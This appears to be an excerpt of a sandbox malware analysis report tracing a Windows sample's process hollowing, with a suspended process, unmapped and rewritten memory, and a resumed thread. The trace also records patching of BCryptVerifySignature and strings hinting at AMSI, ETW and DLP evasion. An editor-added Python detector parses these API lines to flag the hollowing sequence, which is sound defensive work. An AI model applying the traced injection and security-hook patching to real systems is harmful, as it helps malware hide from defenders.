2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 
2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetCurrentProcess call 2997968 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 4577->4638 4578->4577 4727 29a74a8-29a8b96 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 
call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 * 16 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 
call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 ExitProcess 4637->4727 4728 29a6cdd-29a6cec call 29848b0 4637->4728 5164 29a69bb-29a6b4f call 29849bc call 299c5bc call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 EnumSystemLocalesA 4638->5164 5165 29a69b6-29a69b9 4638->5165 4728->4727 4736 29a6cf2-29a6fc5 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299d198 call 2984824 call 2984964 call 2984698 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2987e18 4728->4736 4979 29a6fcb-29a729d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299c74c call 29844f4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 * 2 call 2984728 call 299c3f8 4736->4979 4980 29a72a2-29a74a3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 
call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29849bc call 2997f48 4736->4980 4979->4980 4980->4727 5164->4637 5165->5164
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                              • Part of subcall function 02982EE0: QueryPerformanceCounter.KERNEL32 ref: 02982EE4
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00001000,00000040,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC), ref: 029A681D
                                                                                                                              • Part of subcall function 02997968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                              • Part of subcall function 02997968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                              • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            • EnumSystemLocalesA.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,00000000,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344), ref: 029A6B4F
                                                                                                                              • Part of subcall function 02987E18: GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
                                                                                                                              • Part of subcall function 0299C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
                                                                                                                              • Part of subcall function 0299C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
                                                                                                                              • Part of subcall function 0299C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
                                                                                                                              • Part of subcall function 0299C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
                                                                                                                            • ExitProcess.KERNEL32(00000000,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,Initialize,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC), ref: 029A8B96
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                             • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$AddressHandleModulePathProcProcess$AllocateAttributesCloseCounterCreateCurrentEnumExitLibraryLoadLocalesMemoryNameName_PerformanceQuerySystemVirtualWrite
                                                                                                                            • String ID: Advapi$BCryptVerifySignature$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$bcrypt$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                                                            • API String ID: 724724934-2845693168
                                                                                                                            • Opcode ID: 5b45583b09bea8578b2f0d16edd378443382d8ec9811990ae34a51cf4b9592ff
                                                                                                                            • Instruction ID: 047f7afaad49be69d9249dd4709073306a698abc372d1c076223f1dc82216c26
                                                                                                                            • Opcode Fuzzy Hash: 5b45583b09bea8578b2f0d16edd378443382d8ec9811990ae34a51cf4b9592ff
                                                                                                                            • Instruction Fuzzy Hash: FC33DA35A1025ADFDF20FB64DC909DEB3BABFC9704F5454E5A009AB650DB70AE818F90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 8865 2997f48-2997f4b 8866 2997f50-2997f55 8865->8866 8866->8866 8867 2997f57-299803e call 2984954 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 8866->8867 8898 29999ab-2999a15 call 29844c4 * 2 call 2984c24 call 29844c4 call 29844a0 call 29844c4 * 2 8867->8898 8899 2998044-299811f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 8867->8899 8899->8898 8943 2998125-299844d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2983098 * 2 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 call 2984db4 CreateProcessAsUserW 8899->8943 9050 299844f-29984bb call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 8943->9050 9051 29984c0-29987e6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 
call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetThreadContext 8943->9051 9050->9051 9051->8898 9159 29987ec-2998a4f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtReadVirtualMemory 9051->9159 9230 2998d5c-2998dc8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9159->9230 9231 2998a55-2998bbe call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtUnmapViewOfSection 9159->9231 9258 2998dcd-2998f4d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997968 9230->9258 9317 2998be8-2998c54 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9231->9317 9318 2998bc0-2998bdc call 2997968 9231->9318 9258->8898 9362 2998f53-299904c call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997e58 9258->9362 9326 2998c59-2998d50 
call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997968 9317->9326 9323 2998be1-2998be6 9318->9323 9323->9326 9397 2998d55-2998d5a 9326->9397 9411 299904e-299909b call 2997d50 call 2997d44 9362->9411 9412 29990a0-29999a6 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtWriteVirtualMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 NtWriteVirtualMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 SetThreadContext NtResumeThread call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982c2c call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997ac0 * 3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2997ac0 * 2 call 2984824 call 2984964 call 29847b0 call 2984964 call 2997ac0 call 2984824 call 2984964 call 29847b0 call 2984964 call 2997ac0 call 2984824 call 
2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 9362->9412 9397->9258 9411->9412 9412->8898
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
                                                                                                                              • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
                                                                                                                              • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
                                                                                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E4398,029E4388,OpenSession,029E4360,02999A30,ScanString,029E4360), ref: 02998446
                                                                                                                            • GetThreadContext.KERNEL32(0000083C,029E43DC,ScanString,029E4360,02999A30,UacInitialize,029E4360,02999A30,ScanBuffer,029E4360,02999A30,ScanBuffer,029E4360,02999A30,UacInitialize,029E4360), ref: 029987DF
                                                                                                                            • NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B0,00000004,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360), ref: 02998A3C
                                                                                                                            • NtUnmapViewOfSection.N(00000840,00400000,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B0,00000004,029E44B8), ref: 02998BB7
                                                                                                                              • Part of subcall function 02997968: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 02997975
                                                                                                                              • Part of subcall function 02997968: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0299797B
                                                                                                                              • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00400000,00000000,1DC8A500,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,ScanBuffer,029E4360), ref: 0299920B
                                                                                                                            • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B4,00000004,029E44B8,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,00400000), ref: 0299937E
                                                                                                                            • SetThreadContext.KERNEL32(0000083C,029E43DC,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B4,00000004,029E44B8), ref: 029994F4
                                                                                                                            • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000083C,00000000,0000083C,029E43DC,ScanBuffer,029E4360,02999A30,ScanString,029E4360,02999A30,Initialize,029E4360,02999A30,00000840,002A4FF8,029E44B4), ref: 02999501
                                                                                                                              • Part of subcall function 02997AC0: LoadLibraryW.KERNEL32(bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC,ScanString,029E4360,02999A30), ref: 02997AD2
                                                                                                                              • Part of subcall function 02997AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997ADF
                                                                                                                              • Part of subcall function 02997AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize), ref: 02997AF6
                                                                                                                              • Part of subcall function 02997AC0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,02999A30,Initialize,029E4360,02999A30,UacScan,029E4360,02999A30,UacInitialize,029E4360,02999A30,0000083C,029E43DC), ref: 02997B05
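The API list above is the sequence behind the report's "Sample uses process hollowing technique" signature: CreateProcessAsUserW with dwCreationFlags = 00000004 (CREATE_SUSPENDED, the seventh parameter), GetThreadContext on thread 0000083C, a 4-byte NtReadVirtualMemory from process 00000840, NtUnmapViewOfSection of 00400000, NtAllocateVirtualMemory, NtWriteVirtualMemory of the new image plus a 4-byte write back to the same remote address that was read, SetThreadContext and NtResumeThread. The nested helper 02997AC0 (LoadLibraryW(bcrypt), GetProcAddress(BCryptVerifySignature), NtWriteVirtualMemory into handle 00000840) additionally overwrites that export inside the child. The following Python is an added example written by the editor for this page; it is not code from the Joe Sandbox report or from the sample. It parses the report's own API lines (copied below with argument lists abridged) and flags the ordered hollowing stages, the CREATE_SUSPENDED flag, the process and thread handles the remote calls target, and the export patched through the helper. The stage table, the regex for Joe's "Name.MODULE(args), ref: ADDR" layout, the parameter positions of dwCreationFlags and the benign control lines (with made-up addresses) are the editor's assumptions.

```python
"""Added example (editor's own, not from the Joe Sandbox report or the sample):
parse the report's "APIs" lines and flag process hollowing plus remote export patches."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit (winbase.h)

# Position of dwCreationFlags per CreateProcess* variant (hToken/logon params shift it).
CREATION_FLAGS_INDEX = {
    "CreateProcessA": 5, "CreateProcessW": 5,
    "CreateProcessAsUserA": 6, "CreateProcessAsUserW": 6, "CreateProcessWithLogonW": 6,
}
# Hollowing stages keyed by the API names Joe Sandbox prints (assumption: these spellings).
STAGE_OF = {
    "GetThreadContext": "read_context",
    "NtReadVirtualMemory": "read_remote", "ReadProcessMemory": "read_remote",
    "NtUnmapViewOfSection": "unmap", "ZwUnmapViewOfSection": "unmap",
    "NtAllocateVirtualMemory": "allocate", "VirtualAllocEx": "allocate",
    "NtWriteVirtualMemory": "write", "WriteProcessMemory": "write",
    "SetThreadContext": "set_context",
    "NtResumeThread": "resume", "ResumeThread": "resume",
}
# Ordered subsequence treated as hollowing; unmap/allocate are recorded but optional.
REQUIRED_ORDER = ["spawn_suspended", "read_context", "write", "set_context", "resume"]

# Copied from this report's API list for the function at 02997F48 (args abridged with "...").
SAMPLE_LINES = r"""
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,029E4398,029E4388,OpenSession,029E4360,02999A30,ScanString,029E4360), ref: 02998446
• GetThreadContext.KERNEL32(0000083C,029E43DC,ScanString,029E4360,...), ref: 029987DF
• NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B0,00000004,029E44B8,...), ref: 02998A3C
• NtUnmapViewOfSection.N(00000840,00400000,ScanBuffer,029E4360,...), ref: 02998BB7
  • Part of subcall function 02997968: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 0299799B
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00400000,00000000,1DC8A500,029E44B8,...), ref: 0299920B
• NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,002A4FF8,029E44B4,00000004,029E44B8,...), ref: 0299937E
• SetThreadContext.KERNEL32(0000083C,029E43DC,ScanBuffer,029E4360,...), ref: 029994F4
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000083C,00000000,0000083C,029E43DC,...), ref: 02999501
  • Part of subcall function 02997AC0: LoadLibraryW.KERNEL32(bcrypt,02999A30,Initialize,...), ref: 02997AD2
  • Part of subcall function 02997AC0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02997ADF
  • Part of subcall function 02997AC0: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000840,00000000,?,00000001,?,...), ref: 02997AF6
"""
# Constructed negative control (addresses made up): CreateProcessW without CREATE_SUSPENDED.
CONSTRUCTED_BENIGN_LINES = """
• CreateProcessW.KERNEL32(00000000,0019F2A0,00000000,00000000,00000000,00000000,00000000,00000000,0019F2C4,0019F2E0), ref: 00401234
• WaitForSingleObject.KERNEL32(000001A8,FFFFFFFF), ref: 00401250
"""
LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[^(]+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int
    subcall: Optional[str]  # address of the helper this call is nested in, if any


def _hex(token: str) -> Optional[int]:
    """Joe prints numeric args as hex; '?' and string args give None."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for raw in text.splitlines():
        m = LINE_RE.search(raw)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            calls.append(ApiCall(m.group("name"), m.group("module"), args,
                                 int(m.group("ref"), 16), m.group("sub")))
    return calls


def _is_subsequence(needle: List[str], hay: List[str]) -> bool:
    it = iter(hay)
    return all(x in it for x in needle)


def detect_process_hollowing(calls: List[ApiCall]) -> Dict[str, object]:
    """Map calls to stages, check their order, and collect the remote handles used."""
    stages: List[str] = []
    process_handles, thread_handles = set(), set()
    for c in calls:
        stage = STAGE_OF.get(c.name)
        idx = CREATION_FLAGS_INDEX.get(c.name)
        if idx is not None:
            flags = _hex(c.args[idx]) if len(c.args) > idx else None
            stage = "spawn_suspended" if flags is not None and flags & CREATE_SUSPENDED else "spawn"
        if stage is None:
            continue
        stages.append(stage)
        handle = _hex(c.args[0]) if c.args else None  # first param is the target handle
        if handle and stage in ("read_remote", "unmap", "allocate", "write"):
            process_handles.add(handle)
        elif handle and stage in ("read_context", "set_context", "resume"):
            thread_handles.add(handle)
    return {"hollowing": _is_subsequence(REQUIRED_ORDER, stages), "stages": stages,
            "process_handles": sorted(process_handles), "thread_handles": sorted(thread_handles)}


def find_remote_patches(calls: List[ApiCall]) -> List[Tuple[Optional[str], Optional[str], Optional[int]]]:
    """Inside one helper, LoadLibraryW(dll) + GetProcAddress(export) followed by a remote
    write means that export is being patched in the target process: (export, dll, handle)."""
    patches, pending = [], {}
    for c in calls:
        if not c.subcall:
            continue
        if c.name == "LoadLibraryW" and c.args:
            pending[c.subcall] = (c.args[0], None)
        elif c.name == "GetProcAddress" and len(c.args) > 1:
            pending[c.subcall] = (pending.get(c.subcall, (None, None))[0], c.args[1])
        elif c.name in ("NtWriteVirtualMemory", "WriteProcessMemory") and c.subcall in pending:
            dll, export = pending.pop(c.subcall)
            patches.append((export, dll, _hex(c.args[0]) if c.args else None))
    return patches
```

Run against SAMPLE_LINES the detector reports hollowing with every remote-memory call aimed at process handle 0x840 and every context/resume call at thread handle 0x83C, and the patch finder returns BCryptVerifySignature in bcrypt for that same handle; against the constructed control it reports only a plain spawn. The order check is deliberately a subsequence rather than an exact match so that extra reads, allocations or helper calls between the stages do not hide the pattern.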
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                             • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
